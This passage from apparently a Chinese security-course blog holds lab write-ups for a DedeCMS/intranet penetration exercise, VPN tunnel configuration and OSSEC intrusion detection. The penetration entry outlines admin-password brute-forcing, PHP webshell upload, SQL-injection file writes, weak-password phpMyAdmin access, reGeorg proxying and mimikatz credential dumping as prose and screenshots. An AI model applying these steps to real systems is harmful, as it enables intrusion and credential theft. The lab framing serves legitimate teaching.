src="https://i.loli.net/2021/05/11/FxTUPCjXGvIynlB.png" alt="image-20210511192257809"></p><p><img src="https://i.loli.net/2021/05/11/ikNn3sPr6BKC1wb.png" alt="image-20210511192310808"></p><p>然后利用exp写入webshell</p><p><img src="https://i.loli.net/2021/05/11/rRZopefLCVQz47c.png" alt="image-20210511192516771"></p><p>中国菜刀连接,即可获得flag。</p>]]></content>
<categories>
<category> 渗透 </category>
</categories>
</entry>
<entry>
<title>企业渗透1</title>
<link href="/2021/05/01/%E6%B8%97%E9%80%8F1/"/>
<url>/2021/05/01/%E6%B8%97%E9%80%8F1/</url>
<content type="html"><![CDATA[<h3 id="实验描述"><a href="#实验描述" class="headerlink" title="实验描述"></a>实验描述</h3><p>本实验的任务是通过外网的主机通过代理渗透到内网的主机。在渗透的过程中一般需要先进行端口扫描猜测主机上运行的服务,再通过漏洞利用脚本和其他扫描工具进一步确定漏洞存在,进而完成主机渗透拿到权限。</p><p>本实验的任务是通过外网的主机通过代理渗透到内网的主机。在渗透的过程中一般需要先进行端口扫描猜测主机上运行的服务,再通过漏洞利用脚本和其他扫描工具进一步确定漏洞存在,进而完成主机渗透拿到权限。</p><h3 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">爆破web网站后台,进入后台上传webshell</span><br><span class="line">通过sql注入漏洞获取webshell</span><br><span class="line">通过phpmyadmin写webshell</span><br><span class="line">通过代理扫描内网</span><br><span class="line">通过数据库中获取的密码登录内网机器</span><br><span class="line">抓取域控账号和密码登录域控</span><br></pre></td></tr></table></figure><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h3><table><thead><tr><th>操作系统</th><th>IP地址</th><th>服务器角色</th><th>登录账户密码</th></tr></thead><tbody><tr><td>Windows7</td><td>192.168.1.200</td><td>操作机</td><td>用户名:administrator;密码:Simplexue123</td></tr><tr><td>centos 7</td><td>192.168.1.10</td><td>目标机</td><td>用户名:root;密码:Simplexue123</td></tr><tr><td>Windows2012</td><td>192.168.2.10</td><td>目标机</td><td>用户名:administrator;密码:Simplexue123</td></tr><tr><td>Windows2012</td><td>192.168.2.11</td><td>目标机</td><td>用户名:administrator;密码:Simplexue123</td></tr></tbody></table><h3 id="任务一-后台文件上传"><a href="#任务一-后台文件上传" class="headerlink" title="任务一 后台文件上传"></a>任务一 后台文件上传</h3><p>描述:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">使用wwwscan扫描网站后台目录,利用Burpsuite工具爆破网站后台用户名密码,获取cms的管理员密码登录后台。</span><br><span class="line">构造php一句话木马,利用后台任意文件上传漏洞将木马上传到目标服务器,然后再使用中国菜刀连接一句话木马,获取目标服务器的webshell以便进行后续的操作。</span><br></pre></td></tr></table></figure><p>首先打开网页查看</p><p><img src="https://i.loli.net/2021/05/06/U5wakiReVrG76Ho.png" alt="image-20210506201939054"></p><p>发现是织梦CMS</p><p>使用wwwscan爆破网站后台目录</p><p><img src="https://i.loli.net/2021/05/06/YPVg21coT3bOSRJ.png" alt="image-20210506202129351"></p><p><img src="https://i.loli.net/2021/05/06/NYm1nIzM2aSgc3x.png" alt="image-20210506202228623"></p><p>发现后台登陆:manager/login.php</p><p><img src="https://i.loli.net/2021/05/06/vjwTB57sKW6eVfC.png" alt="image-20210506202453744"></p><p>填写密码,使用bp抓包</p><p><img src="https://i.loli.net/2021/05/06/4vabkWjgtGyYoh5.png" alt="image-20210506202604343"></p><p><img src="https://i.loli.net/2021/05/06/cxjk2VEC8JsN6Hr.png" alt="image-20210506202625359"></p><p>选择密码字典爆破</p><p><img src="https://i.loli.net/2021/05/11/LmEGcCqKJ7rnVUT.png" alt="image-20210506202719447"></p><p>成功:admin:1q2w3e4r</p><p><img src="https://i.loli.net/2021/05/06/z91RP2IEyxBjZvl.png" alt="image-20210506202909814"></p><p>登陆成功并上传一句话木马</p><p><img src="https://i.loli.net/2021/05/06/4zsJ9egB6DHLhFl.png" alt="image-20210506203157878"></p><p>打开中国菜刀并进行连接</p><p><img src="https://i.loli.net/2021/05/06/YOsSck3v4HxGlfe.png" alt="image-20210506203933982"></p><p><img src="https://i.loli.net/2021/05/06/IQX6vGCH8xW2PAi.png" alt="image-20210506204020172"></p><h3 id="任务二-sql注入"><a href="#任务二-sql注入" class="headerlink" title="任务二 sql注入"></a>任务二 sql注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用之前扫描目录得到的结果访问到测试的sql页面,利用SQL注入漏洞获得网站数据库信息</span><br><span class="line">构造SQL注入语句读取webserver配置文件查看网站根目录,写入php一句话木马,获得webshell。</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">访问/sql目录,利用SQL注入漏洞获取网站数据库基本信息,如当前使用的数据库用户等。</span><br><span class="line">利用SQL注入漏洞读取apache的配置文件,并通过配置文件中获取的网站根目录将一句话木马写入到网站目录中。</span><br><span class="line">使用中国菜刀连接目标服务器上的一句话木马,查找网站根目录下文件中包含的flag值并提交</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/06/t8cnPa4fMJRUsLv.png" alt="image-20210506204835331"></p><p><img src="https://i.loli.net/2021/05/06/EzkZ1oy2CneVT3l.png" alt="image-20210506204901994"></p><p><img src="https://i.loli.net/2021/05/06/UAGXryeNWLQFZDh.png" alt="image-20210506205006586"></p><p>读取配置文件</p><p>使用双写绕过</p><p><img src="https://i.loli.net/2021/05/06/YVy6zOT1J2fcg5C.png" alt="image-20210506205715832"></p><p><img src="https://i.loli.net/2021/05/06/Ni8IXnZ4eRWr9bx.png" alt="image-20210506205902058"></p><p>向/var/www/html写入一句话木马</p><p><img src="https://i.loli.net/2021/05/06/5YCon7MD1EvIwTl.png" alt="image-20210506210029983"></p><p>菜刀连接,并获取flag</p><h3 id="任务三-phpmyadmin写shell"><a href="#任务三-phpmyadmin写shell" class="headerlink" title="任务三 phpmyadmin写shell"></a>任务三 phpmyadmin写shell</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用之前扫描目录得到的结果访问到phpmyadmin的页面,利用弱口令登录到phpmyadmin服务中。</span><br><span class="line">构造SQL语句读取webserver配置文件查看网站根目录,写入php一句话木马,获得webshell。</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/06/MdVBYUoZ9lDTSPm.png" alt="image-20210506210247038"></p><p>使用弱口令登陆</p><p>root,root</p><p><img src="https://i.loli.net/2021/05/06/YrQ3Cpa6lk1oXPD.png" alt="image-20210506210525029"></p><p><img src="https://i.loli.net/2021/05/06/6madW51HRokDpih.png" alt="image-20210506210613967"></p><h3 id="任务四"><a href="#任务四" class="headerlink" title="任务四"></a>任务四</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">上传内网扫描的脚本到web的机器上,并对内网192.168.2.0/24段进行扫描</span><br><span class="line">上传regeorg工具到web机器上开启代理服务</span><br><span class="line">使用proxifier 工具代理远程连接访问登录到2.11上</span><br><span class="line">读取C盘上根目录下的文件中的flag字符串,提交后该实验任务完成。</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/06/Fw7pUE6tNOCcn2o.png" alt="image-20210506211116806"></p><p><img src="https://i.loli.net/2021/05/06/vBJpKSn2WsUkFe9.png" alt="image-20210506211151526"></p><h3 id="任务五"><a href="#任务五" class="headerlink" title="任务五"></a>任务五</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用已经登录到远程桌面的机器,上传mimikatz工具抓取机器内存中的密码。</span><br><span class="line">利用抓取到的密码登录到另一台机器2.10中。</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/06/V8pTcCtnD35yfB1.png" alt="image-20210506211320381"></p>]]></content>
<categories>
<category> 渗透 </category>
</categories>
</entry>
<entry>
<title>VPN实验</title>
<link href="/2021/04/22/VPN%E5%AE%9E%E9%AA%8C/"/>
<url>/2021/04/22/VPN%E5%AE%9E%E9%AA%8C/</url>
<content type="html"><![CDATA[<h3 id="实验任务"><a href="#实验任务" class="headerlink" title="实验任务"></a>实验任务</h3><p>虚拟专用网(VPN)被定义为通过一个公用网络(通常是因特网)建立一个临时的、安全的连接,是一条穿过混乱的公用网络的安全、稳定的隧道。虚拟专用网是对企业内部网的扩展。虚拟专用网可以帮助远程用户、公司分支机构、商业伙伴及供应商同公司的内部网建立可信的安全连接,并保证数据的安全传输。虚拟专用网可用于不断增长的移动用户的全球因特网接入,以实现安全连接;可用于实现企业网站之间安全通信的虚拟专用线路,用于经济有效地连接到商业伙伴和用户的安全外联网虚拟专用网。</p><h3 id="实验任务-1"><a href="#实验任务-1" class="headerlink" title="实验任务"></a>实验任务</h3><p>任务一 使用IP命令搭建基于隧道的虚拟专有网络<br>任务二 使用加密工具OpenSSL创建加密密钥<br>任务三 SSL VPN之OpenVPN的安装配置<br>任务四 IPsecVPN原理及安装配置<br>任务五 云计算中基于Overlay技术的隧道网络实现</p><h3 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h3><p>掌握如何搭建基于隧道的虚拟专有网络<br>掌握加密算法了解及其应用<br>掌握如何安装部署配置openvpn服务端与客户端<br>掌握IPsecVPN原理及安装部署<br>了解公有云中overlay的实现</p><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h3><table><thead><tr><th>操作系统</th><th>IP地址</th><th>服务器角色</th><th>登录账户密码</th></tr></thead><tbody><tr><td>Windows2012</td><td>192.168.0.11</td><td>操作机</td><td>用户名:administrator;密码:Simplexue123</td></tr><tr><td>centos7_1</td><td>192.168.1.11</td><td>目标机</td><td>用户名:root;密码:Simplexue123</td></tr><tr><td>centos7_2</td><td>192.168.2.11</td><td>目标机</td><td>用户名:administrator;密码:Simplexue123</td></tr></tbody></table><h3 id="任务一"><a href="#任务一" class="headerlink" title="任务一"></a>任务一</h3><p>使用IP命令搭建基于隧道的虚拟专有网络</p><p>实现两不同网络内的内网通过ip隧道使之互通并检测。</p><img src="https://i.loli.net/2021/04/22/5e2PNlSTRcogbus.png" alt="image-20210422151231083" style="zoom:67%;" /><p>修改主机名</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># hostnamectl set-hostname vpn1</span><br><span class="line"># hostnamectl set-hostname vpn2</span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# modprobe ip_gre</span><br></pre></td></tr></table></figure><p>加载ip_gre内核模块</p><p><img src="https://i.loli.net/2021/04/22/zGsS1vwuEtA6xUk.png" alt="image-20210422152129613"></p><p>配置tunnel(GRE隧道)使它们互通</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~] ip tunnel add gre1 mode gre remote 192.168.2.11 local 192.168.1.11 ttl 255</span><br><span class="line">[root@vpn1 ~] ip a | grep gre1</span><br></pre></td></tr></table></figure><p>启动gre1并分配ip地址10.10.10.1</p><p>vpn2创建一个GRE类型隧道设备gre1, 并设置对端IP为192.168.1.11</p><p>测试隧道是否通</p><p><img src="https://i.loli.net/2021/04/22/1wjiTASMxmYa2DV.png" alt="image-20210422152200036"></p><p>最后卸载GRE模块。</p><h3 id="任务二"><a href="#任务二" class="headerlink" title="任务二"></a>任务二</h3><p>使用加密工具OpenSSL创建加密密钥</p><p>查看帮助信息</p><p><img src="https://i.loli.net/2021/04/22/ZxBGHq4QnIuwOW8.png" alt="image-20210422153402076"></p><p>生产RSA私钥</p><p>生成rsa_private.key私钥对应的公钥 </p><p>生成RAS含密码(使用aes256加密)公私钥</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]<span class="comment"># openssl genrsa -aes256 -passout pass:simple -out rsa__aes_private.key 2048</span></span><br></pre></td></tr></table></figure><p>加密与非加密之间的转换</p><p>生成 RSA 私钥和自签名证书</p><p><img src="https://i.loli.net/2021/04/22/XY8ndkyKWNLtxaS.png" alt="image-20210422155013278"></p><h3 id="任务三"><a href="#任务三" class="headerlink" title="任务三"></a>任务三</h3><p>SSL VPN之OpenVPN的安装配置</p><p>【任务描述】<br>本实验任务基于真实企业网络环境,在两台台服务器搭建的典型企业局域网环境中,主要完成以下内容:<br>(1)搭建openvpn服务端与客户端。<br>(2)实现客户端可访问服务端机器<br>【实验目标】<br>1.了解企业级别openvpn的使用场景。<br>2.掌握企业级别openvpn搭建和使用。<br>3.掌握openvpn客户端与服务端的搭建配置。</p><p>在vpn1机器安装openvpn并验证</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# yum clean all</span><br><span class="line">[root@vpn1 ~]# yum install openvpn -y</span><br></pre></td></tr></table></figure><p>修改openvpn的配置文件server.conf配置文件的内容</p><p><img src="https://i.loli.net/2021/04/22/TVwAs5KPDcbWzG7.png" alt="image-20210422160021557"></p><p>修改openvpn服务端的配置文件</p><p>设置启动用户</p><p>安装密钥生成软件</p><p>配置生成证书的环境变量.并使之生效</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl start</span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl enable</span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl status</span><br></pre></td></tr></table></figure><p>启动openvpn客户端并挂后台运行</p><p><img src="https://i.loli.net/2021/04/22/d4WmDkjI8TKeosl.png" alt="image-20210422160050158"></p><p>查看网卡信息</p><p>openvpn nat配置</p><h3 id="任务四"><a href="#任务四" class="headerlink" title="任务四"></a>任务四</h3><p>【任务描述】<br>本实验任务基于真实企业网络环境,在两台台服务器搭建的典型企业局域网环境中,主要完成以下内容:<br>(1)搭建ipsec服务端与客户端。<br>(2)实现客户端可访问服务端机器<br>【实验目标】<br>1.了解企业级别ipsec的使用场景。<br>2.掌握企业级别ipsec搭建和使用。<br>3.掌握ipsec客户端与服务端的搭建配置。<br>4.掌握ipsec多种验证方式的实现</p><p>添加配置文件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# vim /etc/sysctl.conf</span><br><span class="line">net.ipv4.ip_forward = 1</span><br><span class="line">net.ipv4.conf.default.rp_filter = 0</span><br><span class="line">net.ipv4.conf.all.accept_redirects = 0</span><br><span class="line">net.ipv4.conf.all.send_redirects = 0</span><br><span class="line">net.ipv4.conf.default.accept_redirects = 0</span><br><span class="line">net.ipv4.conf.default.send_redirects = 0</span><br><span class="line">net.ipv4.conf.eth0.accept_redirects = 0</span><br><span class="line">net.ipv4.conf.eth0.send_redirects = 0</span><br><span class="line">net.ipv4.conf.eth1.accept_redirects = 0</span><br><span class="line">net.ipv4.conf.eth1.send_redirects = 0</span><br><span class="line">net.ipv4.conf.lo.accept_redirects = 0</span><br><span class="line">net.ipv4.conf.lo.send_redirects = 0</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/04/22/tfWMBZ7bhgicUoz.png" alt="image-20210422160332518"></p><p>安装openswan、libreswan并验证安装</p><p>启动服务看是否正常</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# yum install openswan libreswan -y</span><br><span class="line">[root@vpn1 ~]# ipsec --version</span><br><span class="line">Linux Libreswan U3.20/K(no kernel code presently loaded) on 3.10.0-693.5.2.el7.x86_64</span><br></pre></td></tr></table></figure><p>两端重新启动服务,并验证</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# systemctl restart ipsec.service</span><br><span class="line">[root@vpn1 ~]# ipsec auto --up net-to-net</span><br></pre></td></tr></table></figure><p>在VPN1和VPN2上分别生成一个新的RSA密钥对</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">conn net-to-net</span><br><span class="line"> # 一端IP地址</span><br><span class="line"> left=192.168.1.11</span><br><span class="line"> #一端内网网段地址</span><br><span class="line"> leftsubnet=10.0.0.0/24</span><br><span class="line"> #一端的标识符,可以任意填写,如果多个连接需要区分</span><br><span class="line"> leftid=@vpn1</span><br><span class="line"> leftnexthop=%defaultroute</span><br><span class="line"> leftrsasigkey=0sAwEAAbUpvs46MbqUxc8bzuU58C0H+tMdYj+JrexW8O3f6WmAIhfNXraG6RBuEchvUePABQGH4eCIlxFj6xRLWnndE4HGOEGFds/ogtG6jmUaE93FXiSby2Ucefm/1DldzNHfneQONo0grR86XWisKgxeV7YjUaqJUFTbYa2iDrivPNqkGqykP6aNpRXk4Kv49mKRKEgGFDpC/82qa45hh6ItL0Itq9QkTDqUQxzcA9fp8rz1adfUAOCKZaXMNfaD7zeaI+gJKyX3D7lb0h/7Nb8qwloaK1kE3BHvrUDZflqlE26NG/+Qfki8a/cp1sfphySmrtSaORKraDwspFZPF3jgeZO98rpiv43sNL1oUOBLwMzRWkZ6K4moMSKcrc32JKXu54klWxjVzVYnR+VOLpB4mPW+gPG9Rbi79VzfAsy2aTTKB73mOqHM6LrkMPo09OFTlfRTwKdG5nz1gjilYvYdi+uLQAdHZvYA2BhoSG2UC5mPC2sHwjLt39dcnq7+I2yyiePYECRGXtCveymJfOBlP1oA1LmkXq5HabgCgqRXDFK7IqkQzkaik+pox8xGrBYNBkrJeokjJ7+QkkFsl3eAKQS5ITp0XGmg6y1ltU7QcRbhKkLndJ9ZcaIWJw==</span><br><span class="line"> right=192.168.2.11</span><br><span class="line"> rightsubnet=10.0.1.0/24</span><br><span class="line"> rightid=@vpn2</span><br><span class="line"> rightnexthop=%defaultroute</span><br><span class="line"> rightrsasigkey=0sAwEAAa8cMIBatj+qSxIv+fg75elY9Vbw2lKNnap4rDsVXrS/gRb65I/IQpbjLswePCOllJ1jF5Y3HDOBTBR4wDGWpVlhY5laKnxQnFPeFMeqdCY6p7NWqN4Khf2Pl6YRo5zPe3P0PXuykv0Ns3ga11EEe/NNmwzL8J/9rd3yxbOIH9/lEaKh6pds0ys6aFZH0V0pwNnc7yg0ESKJ9i+uSDVEeDa+OubQv7+lBGuvCxVjhd/bHaqhGTw2UTw001q+zW4T9qGYuctOn5MWAHZsFXAnKu3wwPGMdHpsVbnZjtIPvsKuuD339H42mGAZ6NM2MLSLbZEaVMnaSv3bdVMBjMCe7ur4/N8suJqmZOofPGBCfV0AkLS5Z6J45eERdHxzmweaeprkamfS8nyMxwJeI7ovHiRfh1+jAufCGdeJ9YgMj4mmeVijLqepsmf0WVhga4XOXiLzRcUtE/DKOvHrE9x9QrWeFQwoQ/fOCLvh40iIn80ggZibeuROqhhU8ms4uers4IRhrhAF4ZUCqcxuHm/viNT0nJ6nN3tKfgp0Yc87S4+xA7S5920iQ/YKGMFF58k1TDQOes8la3yWnPBo4O+WegJDtbvyEXk=</span><br><span class="line"> #add代表只是添加,但并不会连接,如果为start则代表着启动自动连接</span><br><span class="line"> auto=add</span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# systemctl restart ipsec.service</span><br><span class="line">[root@vpn1 ~]# ipsec auto --up net-to-net</span><br></pre></td></tr></table></figure><h3 id="任务五"><a href="#任务五" class="headerlink" title="任务五"></a>任务五</h3><p>【任务描述】<br>本实验任务基于真实企业网络环境,在两台台服务器搭建的典型企业局域网环境中,主要完成以下内容:<br>(1)搭建overlay网络实现不同宿主机之间同网段机器相通。<br>(2)检测网络联通性。<br>【实验目标】<br>1.了解overlay网络的使用场景。<br>2.掌握overlay搭建和使用。<br>3.掌握openvswitch的使用。</p><p>在VPN1和VPN2分别安装openvswitch并启动服务</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# yum install openvswitch -y</span><br></pre></td></tr></table></figure><p>启动服务</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# systemctl start openvswitch.service</span><br></pre></td></tr></table></figure><p>配置VPN1,2</p><p>搭建VXLAN隧道</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ifconfig br0 10.1.0.2/24 up</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/04/22/iJBTVnvfKga8uSD.png" alt="image-20210422160925462"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ovs-vsctl add-port br0 vx1 -- set interface vx1 type=vxlan options:remote_ip=192.168.1.11</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/04/22/QqfIJ6S89yn1tmA.png" alt="image-20210422160953588"></p>]]></content>
<categories>
<category> blog </category>
</categories>
</entry>
<entry>
<title>基于OSSEC的入侵检测</title>
<link href="/2021/04/06/%E5%85%A5%E4%BE%B5%E6%A3%80%E6%B5%8B/"/>
<url>/2021/04/06/%E5%85%A5%E4%BE%B5%E6%A3%80%E6%B5%8B/</url>
<content type="html"><![CDATA[<h1 id="入侵检测实验"><a href="#入侵检测实验" class="headerlink" title="入侵检测实验"></a>入侵检测实验</h1><h3 id="实验背景"><a href="#实验背景" class="headerlink" title="实验背景"></a>实验背景</h3><p>计算机网络安全是一个国际化的问题,每年全球因计算机网络的安全系统被破坏而造成的经济损失达数百亿美元以上,这个数字还在不断增加。政府、银行、大企业等机构都有自己的内网资源。从网络安全的角度看,当公司的内部系统被入侵、破坏与泄密是一个严重的问题。据统计,全球80%以上的入侵来自于内部。由于性能的限制,防火墙通常不能提供实时的入侵检测能力,对于企业内部人员所做的攻击,防火墙形同虚设。因此,如何有效抵御网络入侵和攻击,已成为世界各国国家安全的重要组成部分,也是国家网络经济健康有序发展的关键。</p><p>入侵检测被认为是防火墙之后的第二道安全闸门,入侵检测系统能使在入侵攻击对系统发生危害前,检测到入侵攻击,并利用报警与防护系统驱逐入侵攻击,在不影响网络性能的情况下能对网络进行监听,从而提供对内部攻击、外部攻击和误操作的实时保护,大大提高了网络的安全性。</p><p>入侵检测实验通过企业复杂网络环境的入侵检测操作实战,要求学生深刻理解入侵检测和的概念、原理,进而熟悉入侵检测系统的功能,掌握常用的入侵检测技术和方法,最终具备娴熟的入侵检测能力和信息安全管理职业能力,能够胜任政府、金融、电商等企事业单位的信息安全系统设计、研究、管理等工作,并为国家网络空间安全事业做出应有的贡献。</p><h3 id="实验任务"><a href="#实验任务" class="headerlink" title="实验任务"></a>实验任务</h3><p>任务一 在不同的操作系统环境下安装和配置OSSEC代理,构建入侵检测环境;<br>任务二 监视OSSIM服务器本地root用户的登录情况;<br>任务三 基于SSH的远程非法入侵检测;<br>任务四 监视CentOS7 root用户情况;<br>任务五 监控Web服务器的访问日志。</p><h3 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h3><p>1.掌握在不同的操作系统环境下安装和配置OSSEC代理。<br>2.了解工具PuTTY的基本功能,掌握使用该工具远程连接机器的方法。<br>3.通过安装OSSEC代理,掌握PuTTY工具的实验,掌握配置OSSEC代理的方法,了解OSSEC入侵检测系统的架构、功能以及实现方式,具备构建入侵检测环境的能力。<br>4.掌握OSSIM系统的入侵检测规则设置方法,并能够根据报警信息做入侵行为分析,具备信息系统入侵检测和防范、维护系统安全的职业能力。</p><h3 id="实验原理"><a href="#实验原理" class="headerlink" title="实验原理"></a>实验原理</h3><ol><li>入侵检测与入侵检测系统的概念</li></ol><p>入侵检测(Intrusion Detection,ID), 顾名思义,是对入侵行为的检测。它通过收集和分析计算机网络或计算机系统中若干关键点的信息,检查网络或系统中是否存在违反安全策略的行为和被攻击的迹象,以便决策者有效采取措施,以保证网络系统资源的机密性、完整性和可用性。</p><p>入侵检测系统(intrusion detection system,简称“IDS”)是一种对网络传输进行即时监视,在发现可疑传输时发出警报或者采取主动反应措施的网络安全系统。它与其他网络安全设备的不同之处便在于,IDS是一种积极主动的安全防护技术。</p><ol start="2"><li>OSSIM与OSSEC简介</li></ol><p>OSSIM即开源安全信息管理系统(OPEN SOURCE SECURITY INFORMATION MANAGEMENT),是一个非常流行和完整的开源安全架构体系。OSSIM通过将开源产品进行集成,从而提供一种能够实现安全监控功能的基础平台。 它的目的是提供一种集中式、有组织的、能够更好地进行监测和显示的框架式系统。</p><p>OSSIM明确定位为一个集成解决方案,其目标并不是要开发一个新的功能,而是利用丰富的、强大的各种程序(包括Snort、Rrd、Nmap、 Nessus以及Ntop等开源系统安全软件)。在一个保留他们原有功能和作用的开放式架构体系环境下,将他们集成起来。而OSSIM项目的核心工作在于负责集成和关联各种产品提供的信息,同时进行相关功能的整合。由于开源项目的优点,这些工具已经是久经考验,同时也经过全方位测试、是可靠的工具。<br>OSSEC是一个运行在OSSIM系统中的开源的入侵检测系统,从架构上看它属于C/S架构,从功能上看它可以执行日志收集与分析、完整性检测、rootkit检测、蠕虫检测、Windows注册表和实时报警等任务。它不仅支持OSSIM本身,还可以在UNIX、Linux、Mac、Windows系统中运行。由于OSSEC Server端就安装在OSSIM系统中,并和iptables实现了联动功能,因此只需在客户端安装代理即可,也就是通过OSSEC Server+Agent方式,以实现HIDS系统功能。</p><p>OSSIM系统中的HIDS(Host-based Intrusion Detection System,简称HIDS,即基于主机型入侵检测系统。作为计算机系统的监视器和分析器,它并不作用于外部接口,而是专注于系统内部,监视系统全部或部分的动态的行为以及整个计算机系统的状态。)通过安装在其他操作系统上的Agent程序来审计操作系统以及用户的活动,比如用户的登录、命令操作、软件升级、系统文件的完整性、应用程序使用资源情况等,根据主机行为特征确定是否发生入侵行为,并把警报信息发送给OSSIM上的OSSEC Server。这种HIDS可以精确地分析入侵活动,能确定是哪一个用户或者进程对系统进行过攻击。</p><p>OSSIM系统的工作流程为:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">(1)作为整个系统的安全插件的探测器(Sensor)执行各自的任务,当发现问题时给予报警。</span><br><span class="line">(2)各探测器的报警信息将被集中采集。</span><br><span class="line">(3)将各个报警记录解析并存入事件数据库(EDB)。</span><br><span class="line">(4)根据设置的策略(Policy)给每个事件赋予一个优先级(Priority)。</span><br><span class="line">(5)对事件进行风险评估,给每个警报计算出一个风险系数。</span><br><span class="line">(6)将设置了优先级的各事件发送至关联引擎,关联引擎将对事件进行关联。注意:关联引擎就是指在各入侵检测传感器(入侵检测系统、防火墙等)上报的告警事件基础上,经过关联分析形成入侵行为判定,并将关联分析结果报送控制台。</span><br><span class="line">(7)对一个或多个事件进行关联分析后,关联引擎生成新的报警记录,将其也赋予优先级,并进行风险评估,存入数据库。</span><br><span class="line">(8)用户监控监视器将根据每个事件产生实时的风险图。</span><br><span class="line">(9)在控制面板中给出最近的关联报警记录,在底层控制台中提供全部的事件记录。</span><br></pre></td></tr></table></figure><h3 id="实验工具"><a href="#实验工具" class="headerlink" title="实验工具"></a>实验工具</h3><ul><li>OSSIM</li><li>OSSEC</li><li>Putty</li><li>Firefox</li></ul><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h3><table><thead><tr><th>操作系统</th><th>IP地址</th><th>服务器角色</th><th>登录账户密码</th></tr></thead><tbody><tr><td>OSSIM</td><td>192.168.1.200</td><td>OSSEC Server</td><td>用户名:root;密码:Simplexue123</td></tr><tr><td>CentOS7</td><td>192.168.1.6</td><td>OSSEC 